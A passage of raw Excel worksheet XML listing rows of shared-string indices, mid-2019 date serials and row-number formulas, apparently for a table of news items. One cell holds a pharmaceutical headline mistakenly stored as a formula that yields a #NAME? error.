        <v>943</v>
      </c>
      <c r="C15944" t="s">
        <v>25497</v>
      </c>
      <c r="D15944" s="1">
        <v>43677</v>
      </c>
      <c r="E15944" t="s">
        <v>26178</v>
      </c>
      <c r="F15944" t="s">
        <v>9975</v>
      </c>
      <c r="G15944" t="s">
        <v>26741</v>
      </c>
    </row>
    <row r="15945" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15945">
        <f t="shared" si="249"/>
        <v>15944</v>
      </c>
      <c r="B15945">
        <v>944</v>
      </c>
      <c r="C15945" t="s">
        <v>25497</v>
      </c>
      <c r="D15945" s="1">
        <v>43675</v>
      </c>
      <c r="E15945" t="s">
        <v>26742</v>
      </c>
      <c r="F15945" t="s">
        <v>10021</v>
      </c>
      <c r="G15945" t="s">
        <v>26743</v>
      </c>
    </row>
    <row r="15946" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15946">
        <f t="shared" si="249"/>
        <v>15945</v>
      </c>
      <c r="B15946">
        <v>945</v>
      </c>
      <c r="C15946" t="s">
        <v>25497</v>
      </c>
      <c r="D15946" s="1">
        <v>43676</v>
      </c>
      <c r="E15946" t="s">
        <v>25886</v>
      </c>
      <c r="F15946" t="s">
        <v>9975</v>
      </c>
      <c r="G15946" t="s">
        <v>26744</v>
      </c>
    </row>
    <row r="15947" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15947">
        <f t="shared" si="249"/>
        <v>15946</v>
      </c>
      <c r="B15947">
        <v>946</v>
      </c>
      <c r="C15947" t="s">
        <v>25497</v>
      </c>
      <c r="D15947" s="1">
        <v>43672</v>
      </c>
      <c r="E15947" t="s">
        <v>25509</v>
      </c>
      <c r="F15947" t="s">
        <v>10021</v>
      </c>
      <c r="G15947" t="s">
        <v>26745</v>
      </c>
    </row>
    <row r="15948" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15948">
        <f t="shared" si="249"/>
        <v>15947</v>
      </c>
      <c r="B15948">
        <v>947</v>
      </c>
      <c r="C15948" t="s">
        <v>25497</v>
      </c>
      <c r="D15948" s="1">
        <v>43673</v>
      </c>
      <c r="F15948" t="s">
        <v>9975</v>
      </c>
      <c r="G15948" t="s">
        <v>26746</v>
      </c>
    </row>
    <row r="15949" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15949">
        <f t="shared" si="249"/>
        <v>15948</v>
      </c>
      <c r="B15949">
        <v>948</v>
      </c>
      <c r="C15949" t="s">
        <v>25497</v>
      </c>
      <c r="D15949" s="1">
        <v>43676</v>
      </c>
      <c r="E15949" t="s">
        <v>25512</v>
      </c>
      <c r="F15949" t="s">
        <v>9975</v>
      </c>
      <c r="G15949" t="s">
        <v>26747</v>
      </c>
    </row>
    <row r="15950" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15950">
        <f t="shared" si="249"/>
        <v>15949</v>
      </c>
      <c r="B15950">
        <v>949</v>
      </c>
      <c r="C15950" t="s">
        <v>25497</v>
      </c>
      <c r="D15950" s="1">
        <v>43672</v>
      </c>
      <c r="F15950" t="s">
        <v>9975</v>
      </c>
      <c r="G15950" t="s">
        <v>26748</v>
      </c>
    </row>
    <row r="15951" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15951">
        <f t="shared" si="249"/>
        <v>15950</v>
      </c>
      <c r="B15951">
        <v>950</v>
      </c>
      <c r="C15951" t="s">
        <v>25497</v>
      </c>
      <c r="D15951" s="1">
        <v>43670</v>
      </c>
      <c r="E15951" t="s">
        <v>21279</v>
      </c>
      <c r="F15951" t="s">
        <v>10526</v>
      </c>
      <c r="G15951" t="s">
        <v>26749</v>
      </c>
    </row>
    <row r="15952" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15952">
        <f t="shared" si="249"/>
        <v>15951</v>
      </c>
      <c r="B15952">
        <v>951</v>
      </c>
      <c r="C15952" t="s">
        <v>25497</v>
      </c>
      <c r="D15952" s="1">
        <v>43670</v>
      </c>
      <c r="E15952" t="s">
        <v>26750</v>
      </c>
      <c r="F15952" t="s">
        <v>9975</v>
      </c>
      <c r="G15952" t="s">
        <v>26751</v>
      </c>
    </row>
    <row r="15953" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15953">
        <f t="shared" si="249"/>
        <v>15952</v>
      </c>
      <c r="B15953">
        <v>952</v>
      </c>
      <c r="C15953" t="s">
        <v>25497</v>
      </c>
      <c r="D15953" s="1">
        <v>43675</v>
      </c>
      <c r="E15953" t="s">
        <v>25942</v>
      </c>
      <c r="F15953" t="s">
        <v>9975</v>
      </c>
      <c r="G15953" t="s">
        <v>26752</v>
      </c>
    </row>
    <row r="15954" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15954">
        <f t="shared" si="249"/>
        <v>15953</v>
      </c>
      <c r="B15954">
        <v>953</v>
      </c>
      <c r="C15954" t="s">
        <v>25497</v>
      </c>
      <c r="D15954" s="1">
        <v>43671</v>
      </c>
      <c r="E15954" t="s">
        <v>25517</v>
      </c>
      <c r="F15954" t="s">
        <v>9975</v>
      </c>
      <c r="G15954" t="s">
        <v>26753</v>
      </c>
    </row>
    <row r="15955" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15955">
        <f t="shared" si="249"/>
        <v>15954</v>
      </c>
      <c r="B15955">
        <v>954</v>
      </c>
      <c r="C15955" t="s">
        <v>25497</v>
      </c>
      <c r="D15955" s="1">
        <v>43675</v>
      </c>
      <c r="E15955" t="s">
        <v>19705</v>
      </c>
      <c r="F15955" t="s">
        <v>9975</v>
      </c>
      <c r="G15955" t="s">
        <v>26754</v>
      </c>
    </row>
    <row r="15956" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15956">
        <f t="shared" si="249"/>
        <v>15955</v>
      </c>
      <c r="B15956">
        <v>955</v>
      </c>
      <c r="C15956" t="s">
        <v>25497</v>
      </c>
      <c r="D15956" s="1">
        <v>43676</v>
      </c>
      <c r="E15956" t="s">
        <v>25512</v>
      </c>
      <c r="F15956" t="s">
        <v>9975</v>
      </c>
      <c r="G15956" t="s">
        <v>26755</v>
      </c>
    </row>
    <row r="15957" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15957">
        <f t="shared" si="249"/>
        <v>15956</v>
      </c>
      <c r="B15957">
        <v>956</v>
      </c>
      <c r="C15957" t="s">
        <v>25497</v>
      </c>
      <c r="D15957" s="1">
        <v>43670</v>
      </c>
      <c r="E15957" t="s">
        <v>25506</v>
      </c>
      <c r="F15957" t="s">
        <v>9975</v>
      </c>
      <c r="G15957" t="s">
        <v>26756</v>
      </c>
    </row>
    <row r="15958" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15958">
        <f t="shared" si="249"/>
        <v>15957</v>
      </c>
      <c r="B15958">
        <v>957</v>
      </c>
      <c r="C15958" t="s">
        <v>25497</v>
      </c>
      <c r="D15958" s="1">
        <v>43674</v>
      </c>
      <c r="E15958" t="s">
        <v>26293</v>
      </c>
      <c r="F15958" t="s">
        <v>9975</v>
      </c>
      <c r="G15958" t="s">
        <v>26757</v>
      </c>
    </row>
    <row r="15959" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15959">
        <f t="shared" si="249"/>
        <v>15958</v>
      </c>
      <c r="B15959">
        <v>958</v>
      </c>
      <c r="C15959" t="s">
        <v>25497</v>
      </c>
      <c r="D15959" s="1">
        <v>43670</v>
      </c>
      <c r="E15959" t="s">
        <v>26758</v>
      </c>
      <c r="F15959" t="s">
        <v>10526</v>
      </c>
      <c r="G15959" t="s">
        <v>26759</v>
      </c>
    </row>
    <row r="15960" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15960">
        <f t="shared" si="249"/>
        <v>15959</v>
      </c>
      <c r="B15960">
        <v>959</v>
      </c>
      <c r="C15960" t="s">
        <v>25497</v>
      </c>
      <c r="D15960" s="1">
        <v>43671</v>
      </c>
      <c r="E15960" t="s">
        <v>26750</v>
      </c>
      <c r="F15960" t="s">
        <v>9975</v>
      </c>
      <c r="G15960" t="s">
        <v>26760</v>
      </c>
    </row>
    <row r="15961" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15961">
        <f t="shared" si="249"/>
        <v>15960</v>
      </c>
      <c r="B15961">
        <v>960</v>
      </c>
      <c r="C15961" t="s">
        <v>25497</v>
      </c>
      <c r="D15961" s="1">
        <v>43676</v>
      </c>
      <c r="F15961" t="s">
        <v>9975</v>
      </c>
      <c r="G15961" t="s">
        <v>26761</v>
      </c>
    </row>
    <row r="15962" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15962">
        <f t="shared" si="249"/>
        <v>15961</v>
      </c>
      <c r="B15962">
        <v>961</v>
      </c>
      <c r="C15962" t="s">
        <v>25497</v>
      </c>
      <c r="D15962" s="1">
        <v>43675</v>
      </c>
      <c r="E15962" t="s">
        <v>26762</v>
      </c>
      <c r="F15962" t="s">
        <v>10021</v>
      </c>
      <c r="G15962" t="s">
        <v>26763</v>
      </c>
    </row>
    <row r="15963" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15963">
        <f t="shared" si="249"/>
        <v>15962</v>
      </c>
      <c r="B15963">
        <v>962</v>
      </c>
      <c r="C15963" t="s">
        <v>25497</v>
      </c>
      <c r="D15963" s="1">
        <v>43677</v>
      </c>
      <c r="F15963" t="s">
        <v>9975</v>
      </c>
      <c r="G15963" t="s">
        <v>26764</v>
      </c>
    </row>
    <row r="15964" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15964">
        <f t="shared" si="249"/>
        <v>15963</v>
      </c>
      <c r="B15964">
        <v>963</v>
      </c>
      <c r="C15964" t="s">
        <v>25497</v>
      </c>
      <c r="D15964" s="1">
        <v>43669</v>
      </c>
      <c r="E15964" t="s">
        <v>25609</v>
      </c>
      <c r="F15964" t="s">
        <v>9975</v>
      </c>
      <c r="G15964" t="s">
        <v>26765</v>
      </c>
    </row>
    <row r="15965" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15965">
        <f t="shared" si="249"/>
        <v>15964</v>
      </c>
      <c r="B15965">
        <v>964</v>
      </c>
      <c r="C15965" t="s">
        <v>25497</v>
      </c>
      <c r="D15965" s="1">
        <v>43668</v>
      </c>
      <c r="E15965" t="s">
        <v>26766</v>
      </c>
      <c r="F15965" t="s">
        <v>10526</v>
      </c>
      <c r="G15965" t="s">
        <v>26767</v>
      </c>
    </row>
    <row r="15966" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15966">
        <f t="shared" si="249"/>
        <v>15965</v>
      </c>
      <c r="B15966">
        <v>965</v>
      </c>
      <c r="C15966" t="s">
        <v>25497</v>
      </c>
      <c r="D15966" s="1">
        <v>43670</v>
      </c>
      <c r="E15966" t="s">
        <v>26768</v>
      </c>
      <c r="F15966" t="s">
        <v>9975</v>
      </c>
      <c r="G15966" t="s">
        <v>26769</v>
      </c>
    </row>
    <row r="15967" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15967">
        <f t="shared" si="249"/>
        <v>15966</v>
      </c>
      <c r="B15967">
        <v>966</v>
      </c>
      <c r="C15967" t="s">
        <v>25497</v>
      </c>
      <c r="D15967" s="1">
        <v>43676</v>
      </c>
      <c r="F15967" t="s">
        <v>10021</v>
      </c>
      <c r="G15967" t="s">
        <v>26770</v>
      </c>
    </row>
    <row r="15968" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15968">
        <f t="shared" si="249"/>
        <v>15967</v>
      </c>
      <c r="B15968">
        <v>967</v>
      </c>
      <c r="C15968" t="s">
        <v>25497</v>
      </c>
      <c r="D15968" s="1">
        <v>43670</v>
      </c>
      <c r="E15968" t="s">
        <v>25517</v>
      </c>
      <c r="F15968" t="s">
        <v>9975</v>
      </c>
      <c r="G15968" t="s">
        <v>26771</v>
      </c>
    </row>
    <row r="15969" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15969">
        <f t="shared" si="249"/>
        <v>15968</v>
      </c>
      <c r="B15969">
        <v>968</v>
      </c>
      <c r="C15969" t="s">
        <v>25497</v>
      </c>
      <c r="D15969" s="1">
        <v>43671</v>
      </c>
      <c r="E15969" t="s">
        <v>25517</v>
      </c>
      <c r="F15969" t="s">
        <v>9975</v>
      </c>
      <c r="G15969" t="s">
        <v>26772</v>
      </c>
    </row>
    <row r="15970" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15970">
        <f t="shared" si="249"/>
        <v>15969</v>
      </c>
      <c r="B15970">
        <v>969</v>
      </c>
      <c r="C15970" t="s">
        <v>25497</v>
      </c>
      <c r="D15970" s="1">
        <v>43676</v>
      </c>
      <c r="E15970" t="s">
        <v>26350</v>
      </c>
      <c r="F15970" t="s">
        <v>9975</v>
      </c>
      <c r="G15970" t="s">
        <v>26773</v>
      </c>
    </row>
    <row r="15971" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15971">
        <f t="shared" si="249"/>
        <v>15970</v>
      </c>
      <c r="B15971">
        <v>970</v>
      </c>
      <c r="C15971" t="s">
        <v>25497</v>
      </c>
      <c r="D15971" s="1">
        <v>43676</v>
      </c>
      <c r="F15971" t="s">
        <v>9975</v>
      </c>
      <c r="G15971" t="s">
        <v>26774</v>
      </c>
    </row>
    <row r="15972" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15972">
        <f t="shared" si="249"/>
        <v>15971</v>
      </c>
      <c r="B15972">
        <v>971</v>
      </c>
      <c r="C15972" t="s">
        <v>25497</v>
      </c>
      <c r="D15972" s="1">
        <v>43676</v>
      </c>
      <c r="F15972" t="s">
        <v>9975</v>
      </c>
      <c r="G15972" t="s">
        <v>26775</v>
      </c>
    </row>
    <row r="15973" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15973">
        <f t="shared" si="249"/>
        <v>15972</v>
      </c>
      <c r="B15973">
        <v>972</v>
      </c>
      <c r="C15973" t="s">
        <v>25497</v>
      </c>
      <c r="D15973" s="1">
        <v>43677</v>
      </c>
      <c r="E15973" t="s">
        <v>25592</v>
      </c>
      <c r="F15973" t="s">
        <v>9975</v>
      </c>
      <c r="G15973" t="s">
        <v>26776</v>
      </c>
    </row>
    <row r="15974" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15974">
        <f t="shared" si="249"/>
        <v>15973</v>
      </c>
      <c r="B15974">
        <v>973</v>
      </c>
      <c r="C15974" t="s">
        <v>25497</v>
      </c>
      <c r="D15974" s="1">
        <v>43670</v>
      </c>
      <c r="E15974" t="s">
        <v>25543</v>
      </c>
      <c r="F15974" t="s">
        <v>9975</v>
      </c>
      <c r="G15974" t="s">
        <v>26777</v>
      </c>
    </row>
    <row r="15975" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15975">
        <f t="shared" si="249"/>
        <v>15974</v>
      </c>
      <c r="B15975">
        <v>974</v>
      </c>
      <c r="C15975" t="s">
        <v>25497</v>
      </c>
      <c r="D15975" s="1">
        <v>43675</v>
      </c>
      <c r="F15975" t="s">
        <v>9975</v>
      </c>
      <c r="G15975" t="s">
        <v>26778</v>
      </c>
    </row>
    <row r="15976" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15976">
        <f t="shared" si="249"/>
        <v>15975</v>
      </c>
      <c r="B15976">
        <v>975</v>
      </c>
      <c r="C15976" t="s">
        <v>25497</v>
      </c>
      <c r="D15976" s="1">
        <v>43675</v>
      </c>
      <c r="E15976" t="s">
        <v>26779</v>
      </c>
      <c r="F15976" t="s">
        <v>10526</v>
      </c>
      <c r="G15976" t="s">
        <v>26780</v>
      </c>
    </row>
    <row r="15977" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15977">
        <f t="shared" si="249"/>
        <v>15976</v>
      </c>
      <c r="B15977">
        <v>976</v>
      </c>
      <c r="C15977" t="s">
        <v>25497</v>
      </c>
      <c r="D15977" s="1">
        <v>43676</v>
      </c>
      <c r="E15977" t="s">
        <v>25517</v>
      </c>
      <c r="F15977" t="s">
        <v>9975</v>
      </c>
      <c r="G15977" t="s">
        <v>26781</v>
      </c>
    </row>
    <row r="15978" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15978">
        <f t="shared" si="249"/>
        <v>15977</v>
      </c>
      <c r="B15978">
        <v>977</v>
      </c>
      <c r="C15978" t="s">
        <v>25497</v>
      </c>
      <c r="D15978" s="1">
        <v>43668</v>
      </c>
      <c r="F15978" t="s">
        <v>9975</v>
      </c>
      <c r="G15978" t="s">
        <v>26782</v>
      </c>
    </row>
    <row r="15979" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15979">
        <f t="shared" si="249"/>
        <v>15978</v>
      </c>
      <c r="B15979">
        <v>978</v>
      </c>
      <c r="C15979" t="s">
        <v>25497</v>
      </c>
      <c r="D15979" s="1">
        <v>43670</v>
      </c>
      <c r="F15979" t="s">
        <v>9975</v>
      </c>
      <c r="G15979" t="s">
        <v>26783</v>
      </c>
    </row>
    <row r="15980" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15980">
        <f t="shared" si="249"/>
        <v>15979</v>
      </c>
      <c r="B15980">
        <v>979</v>
      </c>
      <c r="C15980" t="s">
        <v>25497</v>
      </c>
      <c r="D15980" s="1">
        <v>43669</v>
      </c>
      <c r="F15980" t="s">
        <v>9975</v>
      </c>
      <c r="G15980" t="s">
        <v>26784</v>
      </c>
    </row>
    <row r="15981" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15981">
        <f t="shared" si="249"/>
        <v>15980</v>
      </c>
      <c r="B15981">
        <v>980</v>
      </c>
      <c r="C15981" t="s">
        <v>25497</v>
      </c>
      <c r="D15981" s="1">
        <v>43669</v>
      </c>
      <c r="E15981" t="s">
        <v>26785</v>
      </c>
      <c r="F15981" t="s">
        <v>9975</v>
      </c>
      <c r="G15981" t="s">
        <v>26786</v>
      </c>
    </row>
    <row r="15982" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15982">
        <f t="shared" si="249"/>
        <v>15981</v>
      </c>
      <c r="B15982">
        <v>981</v>
      </c>
      <c r="C15982" t="s">
        <v>25497</v>
      </c>
      <c r="D15982" s="1">
        <v>43676</v>
      </c>
      <c r="E15982" t="s">
        <v>26787</v>
      </c>
      <c r="F15982" t="s">
        <v>9975</v>
      </c>
      <c r="G15982" t="s">
        <v>26788</v>
      </c>
    </row>
    <row r="15983" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15983">
        <f t="shared" si="249"/>
        <v>15982</v>
      </c>
      <c r="B15983">
        <v>982</v>
      </c>
      <c r="C15983" t="s">
        <v>25497</v>
      </c>
      <c r="D15983" s="1">
        <v>43670</v>
      </c>
      <c r="E15983" t="s">
        <v>25512</v>
      </c>
      <c r="F15983" t="s">
        <v>9975</v>
      </c>
      <c r="G15983" t="s">
        <v>26789</v>
      </c>
    </row>
    <row r="15984" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15984">
        <f t="shared" si="249"/>
        <v>15983</v>
      </c>
      <c r="B15984">
        <v>983</v>
      </c>
      <c r="C15984" t="s">
        <v>25497</v>
      </c>
      <c r="D15984" s="1">
        <v>43671</v>
      </c>
      <c r="E15984" t="s">
        <v>26590</v>
      </c>
      <c r="F15984" t="s">
        <v>9975</v>
      </c>
      <c r="G15984" t="s">
        <v>26790</v>
      </c>
    </row>
    <row r="15985" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15985">
        <f t="shared" si="249"/>
        <v>15984</v>
      </c>
      <c r="B15985">
        <v>984</v>
      </c>
      <c r="C15985" t="s">
        <v>25497</v>
      </c>
      <c r="D15985" s="1">
        <v>43676</v>
      </c>
      <c r="E15985" t="s">
        <v>25512</v>
      </c>
      <c r="F15985" t="s">
        <v>9975</v>
      </c>
      <c r="G15985" t="s">
        <v>26791</v>
      </c>
    </row>
    <row r="15986" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15986">
        <f t="shared" si="249"/>
        <v>15985</v>
      </c>
      <c r="B15986">
        <v>985</v>
      </c>
      <c r="C15986" t="s">
        <v>25497</v>
      </c>
      <c r="D15986" s="1">
        <v>43671</v>
      </c>
      <c r="E15986" t="s">
        <v>26792</v>
      </c>
      <c r="F15986" t="s">
        <v>9975</v>
      </c>
      <c r="G15986" t="s">
        <v>26793</v>
      </c>
    </row>
    <row r="15987" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15987">
        <f t="shared" si="249"/>
        <v>15986</v>
      </c>
      <c r="B15987">
        <v>986</v>
      </c>
      <c r="C15987" t="s">
        <v>25497</v>
      </c>
      <c r="D15987" s="1">
        <v>43668</v>
      </c>
      <c r="E15987" t="s">
        <v>26794</v>
      </c>
      <c r="F15987" t="s">
        <v>9975</v>
      </c>
      <c r="G15987" t="s">
        <v>26795</v>
      </c>
    </row>
    <row r="15988" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15988">
        <f t="shared" si="249"/>
        <v>15987</v>
      </c>
      <c r="B15988">
        <v>987</v>
      </c>
      <c r="C15988" t="s">
        <v>25497</v>
      </c>
      <c r="D15988" s="1">
        <v>43669</v>
      </c>
      <c r="E15988" t="s">
        <v>26796</v>
      </c>
      <c r="F15988" t="s">
        <v>9975</v>
      </c>
      <c r="G15988" t="s">
        <v>26797</v>
      </c>
    </row>
    <row r="15989" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15989">
        <f t="shared" si="249"/>
        <v>15988</v>
      </c>
      <c r="B15989">
        <v>988</v>
      </c>
      <c r="C15989" t="s">
        <v>25497</v>
      </c>
      <c r="D15989" s="1">
        <v>43677</v>
      </c>
      <c r="E15989" t="s">
        <v>26798</v>
      </c>
      <c r="F15989" t="s">
        <v>9975</v>
      </c>
      <c r="G15989" t="s">
        <v>26799</v>
      </c>
    </row>
    <row r="15990" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15990">
        <f t="shared" si="249"/>
        <v>15989</v>
      </c>
      <c r="B15990">
        <v>989</v>
      </c>
      <c r="C15990" t="s">
        <v>25497</v>
      </c>
      <c r="D15990" s="1">
        <v>43671</v>
      </c>
      <c r="F15990" t="s">
        <v>9975</v>
      </c>
      <c r="G15990" t="s">
        <v>26800</v>
      </c>
    </row>
    <row r="15991" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15991">
        <f t="shared" si="249"/>
        <v>15990</v>
      </c>
      <c r="B15991">
        <v>990</v>
      </c>
      <c r="C15991" t="s">
        <v>25497</v>
      </c>
      <c r="D15991" s="1">
        <v>43677</v>
      </c>
      <c r="E15991" t="s">
        <v>25512</v>
      </c>
      <c r="F15991" t="s">
        <v>9975</v>
      </c>
      <c r="G15991" t="s">
        <v>26801</v>
      </c>
    </row>
    <row r="15992" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15992">
        <f t="shared" si="249"/>
        <v>15991</v>
      </c>
      <c r="B15992">
        <v>991</v>
      </c>
      <c r="C15992" t="s">
        <v>25497</v>
      </c>
      <c r="D15992" s="1">
        <v>43673</v>
      </c>
      <c r="F15992" t="s">
        <v>9978</v>
      </c>
      <c r="G15992" t="s">
        <v>26802</v>
      </c>
    </row>
    <row r="15993" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15993">
        <f t="shared" si="249"/>
        <v>15992</v>
      </c>
      <c r="B15993">
        <v>992</v>
      </c>
      <c r="C15993" t="s">
        <v>25497</v>
      </c>
      <c r="D15993" s="1">
        <v>43669</v>
      </c>
      <c r="E15993" t="s">
        <v>25517</v>
      </c>
      <c r="F15993" t="s">
        <v>9975</v>
      </c>
      <c r="G15993" t="s">
        <v>26803</v>
      </c>
    </row>
    <row r="15994" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15994">
        <f t="shared" si="249"/>
        <v>15993</v>
      </c>
      <c r="B15994">
        <v>993</v>
      </c>
      <c r="C15994" t="s">
        <v>25497</v>
      </c>
      <c r="D15994" s="1">
        <v>43668</v>
      </c>
      <c r="F15994" t="s">
        <v>10021</v>
      </c>
      <c r="G15994" t="s">
        <v>26804</v>
      </c>
    </row>
    <row r="15995" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15995">
        <f t="shared" si="249"/>
        <v>15994</v>
      </c>
      <c r="B15995">
        <v>994</v>
      </c>
      <c r="C15995" t="s">
        <v>25497</v>
      </c>
      <c r="D15995" s="1">
        <v>43668</v>
      </c>
      <c r="E15995" t="s">
        <v>26805</v>
      </c>
      <c r="F15995" t="s">
        <v>9975</v>
      </c>
      <c r="G15995" t="s">
        <v>26806</v>
      </c>
    </row>
    <row r="15996" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15996">
        <f t="shared" si="249"/>
        <v>15995</v>
      </c>
      <c r="B15996">
        <v>995</v>
      </c>
      <c r="C15996" t="s">
        <v>25497</v>
      </c>
      <c r="D15996" s="1">
        <v>43671</v>
      </c>
      <c r="F15996" t="s">
        <v>9975</v>
      </c>
      <c r="G15996" t="s">
        <v>26807</v>
      </c>
    </row>
    <row r="15997" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15997">
        <f t="shared" si="249"/>
        <v>15996</v>
      </c>
      <c r="B15997">
        <v>996</v>
      </c>
      <c r="C15997" t="s">
        <v>25497</v>
      </c>
      <c r="D15997" s="1">
        <v>43670</v>
      </c>
      <c r="E15997" t="s">
        <v>26750</v>
      </c>
      <c r="F15997" t="s">
        <v>9975</v>
      </c>
      <c r="G15997" t="s">
        <v>26808</v>
      </c>
    </row>
    <row r="15998" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15998">
        <f t="shared" si="249"/>
        <v>15997</v>
      </c>
      <c r="B15998">
        <v>997</v>
      </c>
      <c r="C15998" t="s">
        <v>25497</v>
      </c>
      <c r="D15998" s="1">
        <v>43670</v>
      </c>
      <c r="E15998" t="s">
        <v>25512</v>
      </c>
      <c r="F15998" t="s">
        <v>9975</v>
      </c>
      <c r="G15998" t="s">
        <v>26809</v>
      </c>
    </row>
    <row r="15999" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15999">
        <f t="shared" si="249"/>
        <v>15998</v>
      </c>
      <c r="B15999">
        <v>998</v>
      </c>
      <c r="C15999" t="s">
        <v>25497</v>
      </c>
      <c r="D15999" s="1">
        <v>43674</v>
      </c>
      <c r="F15999" t="s">
        <v>10021</v>
      </c>
      <c r="G15999" t="s">
        <v>26810</v>
      </c>
    </row>
    <row r="16000" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16000">
        <f t="shared" si="249"/>
        <v>15999</v>
      </c>
      <c r="B16000">
        <v>999</v>
      </c>
      <c r="C16000" t="s">
        <v>25497</v>
      </c>
      <c r="D16000" s="1">
        <v>43676</v>
      </c>
      <c r="E16000" t="s">
        <v>25517</v>
      </c>
      <c r="F16000" t="s">
        <v>9975</v>
      </c>
      <c r="G16000" t="s">
        <v>26811</v>
      </c>
    </row>
    <row r="16001" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16001">
        <f t="shared" si="249"/>
        <v>16000</v>
      </c>
      <c r="B16001">
        <v>1000</v>
      </c>
      <c r="C16001" t="s">
        <v>25497</v>
      </c>
      <c r="D16001" s="1">
        <v>43676</v>
      </c>
      <c r="F16001" t="s">
        <v>9978</v>
      </c>
      <c r="G16001" t="e">
        <f>-- Partnership with GENESIS Pharmamarks an important step in the global commercial expansion of ONPATTRO, the first-in-class...</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="16002" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16002">
        <f t="shared" si="249"/>
        <v>16001</v>
      </c>
      <c r="B16002">
        <v>1001</v>
      </c>
      <c r="C16002" t="s">
        <v>25497</v>
      </c>
      <c r="D16002" s="1">
        <v>43671</v>
      </c>
      <c r="E16002" t="s">
        <v>25609</v>
      </c>
      <c r="F16002" t="s">
        <v>9975</v>
      </c>
      <c r="G16002" t="s">
        <v>26812</v>
      </c>
    </row>
    <row r="16003" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16003">
        <f t="shared" ref="A16003:A16066" si="250">+ROW(A16002)</f>
        <v>16002</v>
      </c>
      <c r="B16003">
        <v>1002</v>
      </c>
      <c r="C16003" t="s">
        <v>25497</v>
      </c>
      <c r="D16003" s="1">
        <v>43668</v>
      </c>
      <c r="E16003" t="s">
        <v>26813</v>
      </c>
      <c r="F16003" t="s">
        <v>9975</v>
      </c>
      <c r="G16003" t="s">
        <v>26814</v>
      </c>
    </row>
    <row r="16004" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16004">
        <f t="shared" si="250"/>
        <v>16003</v>
      </c>
      <c r="B16004">
        <v>1003</v>
      </c>
      <c r="C16004" t="s">
        <v>25497</v>
      </c>
      <c r="D16004" s="1">
        <v>43671</v>
      </c>
      <c r="E16004" t="s">
        <v>22141</v>
      </c>
      <c r="F16004" t="s">
        <v>10526</v>
      </c>
      <c r="G16004" t="s">
        <v>26815</v>
      </c>
    </row>
    <row r="16005" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16005">
        <f t="shared" si="250"/>
        <v>16004</v>
      </c>
      <c r="B16005">
        <v>1004</v>
      </c>
      <c r="C16005" t="s">
        <v>25497</v>
      </c>
      <c r="D16005" s="1">
        <v>43672</v>
      </c>
      <c r="E16005" t="s">
        <v>26816</v>
      </c>
      <c r="F16005" t="s">
        <v>9975</v>
      </c>
      <c r="G16005" t="s">
        <v>26817</v>
      </c>
    </row>
    <row r="16006" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16006">
        <f t="shared" si="250"/>
        <v>16005</v>
      </c>
      <c r="B16006">
        <v>1005</v>
      </c>
      <c r="C16006" t="s">
        <v>25497</v>
      </c>
      <c r="D16006" s="1">
        <v>43673</v>
      </c>
      <c r="E16006" t="s">
        <v>26818</v>
      </c>
      <c r="F16006" t="s">
        <v>10526</v>
      </c>
      <c r="G16006" t="s">
        <v>26819</v>
      </c>
    </row>
    <row r="16007" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16007">
